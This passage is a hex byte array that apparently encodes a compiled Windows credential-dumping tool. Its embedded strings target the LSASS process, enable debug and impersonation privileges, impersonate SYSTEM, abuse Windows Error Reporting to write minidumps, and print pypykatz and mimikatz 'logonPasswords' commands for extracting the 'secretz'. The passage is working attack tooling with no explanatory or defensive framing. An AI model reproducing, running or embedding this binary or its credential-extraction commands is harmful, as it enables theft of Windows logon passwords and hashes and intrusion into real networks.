x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xE2,0xA2,0x00,0x00,0x90,0x90,0xFF,0x25,0xCA,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0xBA,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0xAA,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x9A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x8A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x7A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x6A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x5A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x4A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x3A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x2A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x1A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0x0A,0xA1,0x00,0x00,0x90,0x90,0xFF,0x25,0xFA,0xA0,0x00,0x00,0x90,0x90,0xFF,0x25,0xEA,0xA0,0x00,0x00,0x90,0x90,0xFF,0x25,0xDA,0xA0,0x00,0x00,0x90,0x90,0xFF,0x25,0xCA,0xA0,0x00,0x00,0x90,0x90,0xFF,0x25,0xBA,0xA0,0x00,0x00,0x90,0x90,0xFF,0x25,0xAA,0xA0,0x00,0x00,0x90,0x90,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x49,0x89,0xCC,0x48,0x89,0xD3,0x4C,0x89,0xC6,0x4C,0x89,0xCF,0x48,0x85,0xD2,0x75,0x18,0x48,0x89,0xFA,0x48,0x89,0xF1,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x5D,0xE9,0x5B,0xFE,0xFF,0xFF,0x0F,0x1F,0x00,0xE8,0x33,0x00,0x00,0x00,0x85,0xC0,0x78,0x17,0x48,0x63,0xD0,0x48,0x39,0xDA,0x74,0x17,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0x41,0xC6,0x44,0x1C,0xFF,0x00,0xEB,0xC0,0x41,0xC6,0x44,0x14,0xFF,0x00,0xEB,0xE1,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0x25,0x02,0xA1,0x00,0x00,0x90,0x90,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xE9,0x9B,0x21,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xD0,0xF1,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF2,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0xEC,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xEE,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0xEF,0xC5,0xCA,0x01,0x00,0x00,0x00,0x60,0xEE,0xC5,0xCA,0x01,0x00,0x00,0x00,0x40,0xEE,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x49,0x64,0x54,0x6F,0x53,0x65,0x73,0x73,0x69,0x6F,0x6E,0x49,0x64,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x42,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x48,0xFF,0x15,0x00,0x78,0x78,0x78,0x00,0x42,0x61,0x73,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x6E,0x69,0x74,0x54,0x68,0x75,0x6E,0x6B,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x48,0x8B,0xC2,0xFF,0x15,0x24,0xCC,0x06,0x00,0x8B,0x00,0x78,0x3F,0x3F,0x78,0x3F,0x3F,0x3F,0x3F,0x3F,0x78,0x00,0x52,0x74,0x6C,0x55,0x73,0x65,0x72,0x54,0x68,0x72,0x65,0x61,0x64,0x53,0x74,0x61,0x72,0x74,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0xFF,0x00,0x78,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x75,0x6E,0x73,0x75,0x70,0x70,0x6F,0x72,0x74,0x65,0x64,0x20,0x55,0x6E,0x77,0x69,0x6E,0x64,0x20,0x4F,0x70,0x20,0x43,0x6F,0x64,0x65,0x3A,0x20,0x30,0x78,0x25,0x6C,0x78,0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x74,0x68,0x65,0x20,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x70,0x20,0x69,0x73,0x20,0x61,0x20,0x6C,0x65,0x61,0x66,0x20,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x2C,0x20,0x74,0x72,0x79,0x20,0x61,0x6E,0x6F,0x74,0x68,0x65,0x72,0x20,0x6F,0x6E,0x65,0x2E,0x00,0x74,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x66,0x72,0x61,0x6D,0x65,0x73,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x52,0x00,0x65,0x00,0x67,0x00,0x69,0x00,0x73,0x00,0x74,0x00,0x72,0x00,0x79,0x00,0x5C,0x00,0x4D,0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x69,0x00,0x6E,0x00,0x65,0x00,0x5C,0x00,0x53,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x77,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x5C,0x00,0x4D,0x00,0x69,0x00,0x63,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x20,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x20,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x5C,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x54,0x00,0x79,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x4F,0x00,0x62,0x00,0x6A,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x73,0x00,0x5C,0x00,0x53,0x00,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6D,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x52,0x00,0x65,0x00,0x61,0x00,0x64,0x00,0x79,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x74,0x68,0x65,0x20,0x57,0x65,0x72,0x20,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x20,0x72,0x65,0x73,0x70,0x6F,0x6E,0x64,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x61,0x6E,0x20,0x65,0x72,0x72,0x6F,0x72,0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x6F,0x70,0x65,0x6E,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x73,0x70,0x6F,0x6F,0x66,0x65,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x69,0x64,0x20,0x25,0x6C,0x64,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x6E,0x00,0x6F,0x00,0x77,0x00,0x6E,0x00,0x44,0x00,0x6C,0x00,0x6C,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x41,0x00,0x70,0x00,0x70,0x00,0x44,0x00,0x61,0x00,0x74,0x00,0x61,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x44,0x6F,0x6E,0x65,0x2C,0x20,0x72,0x75,0x6E,0x3A,0x20,0x64,0x69,0x72,0x20,0x25,0x6C,0x73,0x5C,0x43,0x72,0x61,0x73,0x68,0x44,0x75,0x6D,0x70,0x73,0x5C,0x00,0x0A,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x27,0x25,0x73,0x27,0x20,0x77,0x61,0x73,0x20,0x6E,0x6F,0x74,0x20,0x66,0x6F,0x75,0x6E,0x64,0x00,0x00,0x5C,0x00,0x3F,0x00,0x3F,0x00,0x5C,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x70,0x61,0x74,0x68,0x20,0x27,0x25,0x6C,0x73,0x27,0x20,0x69,0x73,0x20,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x2E,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x77,0x72,0x69,0x74,0x65,0x20,0x74,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x25,0x6C,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x68,0x61,0x73,0x20,0x61,0x6E,0x20,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x20,0x73,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x2C,0x20,0x72,0x65,0x73,0x74,0x6F,0x72,0x65,0x20,0x69,0x74,0x20,0x72,0x75,0x6E,0x6E,0x69,0x6E,0x67,0x3A,0x0A,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2F,0x72,0x65,0x73,0x74,0x6F,0x72,0x65,0x5F,0x73,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x20,0x25,0x73,0x00,0x44,0x6F,0x6E,0x65,0x2C,0x20,0x74,0x6F,0x20,0x67,0x65,0x74,0x20,0x74,0x68,0x65,0x20,0x73,0x65,0x63,0x72,0x65,0x74,0x7A,0x20,0x72,0x75,0x6E,0x3A,0x0A,0x70,0x79,0x74,0x68,0x6F,0x6E,0x33,0x20,0x2D,0x6D,0x20,0x70,0x79,0x70,0x79,0x6B,0x61,0x74,0x7A,0x20,0x6C,0x73,0x61,0x20,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x25,0x73,0x0A,0x6D,0x69,0x6D,0x69,0x6B,0x61,0x74,0x7A,0x2E,0x65,0x78,0x65,0x20,0x22,0x73,0x65,0x6B,0x75,0x72,0x6C,0x73,0x61,0x3A,0x3A,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x25,0x73,0x22,0x20,0x22,0x73,0x65,0x6B,0x75,0x72,0x6C,0x73,0x61,0x3A,0x3A,0x6C,0x6F,0x67,0x6F,0x6E,0x50,0x61,0x73,0x73,0x77,0x6F,0x72,0x64,0x73,0x20,0x66,0x75,0x6C,0x6C,0x22,0x20,0x65,0x78,0x69,0x74,0x00,0x5C,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x73,0x00,0x2E,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x73,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x4D,0x41,0x58,0x5F,0x48,0x41,0x4E,0x44,0x4C,0x45,0x53,0x00,0x0A,0x00,0x50,0x00,0x72,0x00,0x6F,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x44,0x00,0x69,0x00,0x72,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x6F,0x00,0x72,0x00,0x79,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x6F,0x70,0x65,0x6E,0x20,0x61,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x77,0x69,0x74,0x68,0x20,0x74,0x68,0x65,0x20,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x65,0x64,0x20,0x70,0x65,0x72,0x6D,0x69,0x73,0x73,0x69,0x6F,0x6E,0x73,0x00,0x00,0x54,0x68,0x65,0x20,0x4C,0x53,0x41,0x53,0x53,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x61,0x73,0x20,0x6E,0x6F,0x74,0x20,0x66,0x6F,0x75,0x6E,0x64,0x2E,0x20,0x54,0x72,0x79,0x20,0x70,0x72,0x6F,0x76,0x69,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x50,0x49,0x44,0x20,0x77,0x69,0x74,0x68,0x20,0x2D,0x70,0x20,0x6F,0x72,0x20,0x2D,0x2D,0x70,0x69,0x64,0x00,0x54,0x68,0x65,0x72,0x65,0x20,0x69,0x73,0x20,0x6E,0x6F,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x69,0x74,0x68,0x20,0x74,0x68,0x65,0x20,0x50,0x49,0x44,0x20,0x25,0x6C,0x64,0x2E,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x6F,0x70,0x65,0x6E,0x20,0x61,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x25,0x6C,0x64,0x2E,0x00,0x54,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x65,0x73,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x4D,0x41,0x58,0x5F,0x50,0x52,0x4F,0x43,0x45,0x53,0x53,0x45,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4E,0x6F,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x74,0x68,0x65,0x20,0x4C,0x53,0x41,0x53,0x53,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x61,0x73,0x20,0x66,0x6F,0x75,0x6E,0x64,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4E,0x6F,0x20,0x76,0x61,0x6C,0x69,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x74,0x6F,0x6B,0x65,0x6E,0x20,0x74,0x6F,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x77,0x61,0x73,0x20,0x66,0x6F,0x75,0x6E,0x64,0x2E,0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x41,0x00,0x73,0x00,0x73,0x00,0x69,0x00,0x67,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x6D,0x00,0x61,0x00,0x72,0x00,0x79,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x38,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x53,0x59,0x53,0x54,0x45,0x4D,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x39,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0